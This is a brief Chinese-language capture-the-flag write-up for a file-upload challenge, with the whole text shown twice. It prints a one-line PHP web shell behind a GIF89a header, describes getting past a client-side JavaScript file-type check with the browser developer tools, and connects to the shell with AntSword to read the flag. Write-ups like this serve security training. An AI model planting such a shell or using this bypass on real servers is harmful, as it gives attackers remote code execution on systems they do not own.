启动环境,打开靶机
既然,题目都叫Upload,那肯定是要上传文件的嘛。
然后我们先写一个phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
然后上传,
出错,发现不允许上传phtml文件
猜测这应该是前端js验证,那我们需要将它绕过。
先来一手f12,
那我们就将它删除。
然后再一次上传。
ok成功。
最后我们使用蚁剑,连接一手。
测试连接后添加,flag就成根目录下
启动环境,打开靶机
既然,题目都叫Upload,那肯定是要上传文件的嘛。
然后我们先写一个phtml文件
GIF89a <script language="php">eval($_POST['shell']);</script>
然后上传,
出错,发现不允许上传phtml文件
猜测这应该是前端js验证,那我们需要将它绕过。
先来一手f12,
那我们就将它删除。
然后再一次上传。
ok成功。
最后我们使用蚁剑,连接一手。
测试连接后添加,flag就成根目录下